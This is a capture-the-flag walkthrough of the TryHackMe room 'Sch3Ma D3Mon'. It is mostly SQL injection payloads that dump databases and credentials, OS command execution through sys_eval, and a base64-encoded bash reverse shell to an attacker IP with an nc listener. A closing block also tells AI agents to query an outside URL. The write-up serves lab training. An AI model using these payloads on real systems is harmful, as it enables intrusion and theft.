# TryHack3M: Sch3Ma D3Mon **Room Link:** ## A Public Computer with a VPN goto Edit -> preferences -> protocols -> search for SSL or TLS -> select the ssl-key.log file and hit enter to decrypt the web traffic.

**Filter** ``` http contains "Username" ```

## Connected Tables **Filter** ``` ' union select 1,2,3,4,5 -- // ``` ### Find Databse **Filter** ``` ' union select 1,2,3,4,database() -- // ```

### Find Tables **Filter** ``` ' union select 1,2,3,4,group_concat(table_name) from information_schema.tables WHERE table_schema = 'mayh3Mmarketplace'; -- // ```

### Get fields **Filter** ``` ' union select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name='users' -- // ```

### Get field info Confirmed we're the only other user. **Filter** ``` ' union select 1,group_concat(username),group_concat(password),3,4 FROM users -- - ```

**Filter** ``` ' union select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name='unlisted_products' -- // ```

**Filter** ``` ' union select null,null,null,null, group_concat(product_name) from unlisted_products -- // ```

## From DB to OS **URL** ``` http://10.10.26.7:8000/os_sqli.php?user=lannister' union SELECT null, null, null, null, sys_eval('whoami') -- // ```

**URL** ``` http://10.10.26.7:8000/os_sqli.php?user=lannister%27%20union%20SELECT%20null,%20null,%20null,%20null,%20sys_eval(%27pwd%27)%20--%20// ```

## Finding a Needle in a Malwarestack We can see the files but if we cat them they get cut off. **URL** ``` http://10.10.61.64:8000/os_sqli.php?user=lannister%27%20union%20SELECT%20null,%20null,%20null,%20null,%20sys_eval(%27ls%20%20/home/receipts%27)%20--%20// ```

**URL** ``` ' union select null,null,null,column_name,null from information_schema.columns where table_name='transactions' -- // ```

**URL** ``` ' union select null,null,null,null,group_concat(transaction_number, '::', bcoin_sender_address, '::', bcoin_recipient_address,'\n') from transactions -- // ```

**URL** ``` ' union select null,null,null,sys_exec('touch /var/lib/mysql/my_file.txt'),null -- // ' union select null,null,null,sys_eval('ls -al /home/receipts/ > /var/lib/mysql/my_file.txt'),null -- // ' union select null,null,null,load_file('/var/lib/mysql/my_file.txt'),null -- // verify that our command able to load the file ' union select null,null,null,load_file('/home/receipts/3000000.txt.gpg'),null -- // ```

If you use Burp the output will be nicer to copy over.

**Kali** ``` gpg --decrypt 3000000.txt.gpg Passphrase: eqFN5vBg4n2t4xGsJF7BYNWMtTaVA1muES ```

## Operation Defang

**Kali** ``` nc -lvnp 9001 ``` **URL** ``` http://10.10.61.64:8000/os_sqli.php?user=lannister%27%20union%20SELECT%20null,%20null,%20null,%20null,%20sys_eval(%27echo%20L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2MS4xNDEvOTAwMSAwPiYx%20|%20base64%20-d%20%20|/bin/bash%27)%20--%20// ```

**Victim** ``` script -qc /bin/bash /dev/null ctrl + Z stty raw -echo;fg ``` **Victim** ``` cd /home/products/malware/4sale/pal4t1n3/MisterMeist3r/2DC6C0 ls ```

After reading the code I saw that we can defang the code just by changing the config.ini file fto debug=true so we can run the code without having to worry about what will happen. **Victim** ``` echo "debug=true" > config.ini ./build.sh ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/tryhack3m-sch3ma-d3mon.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.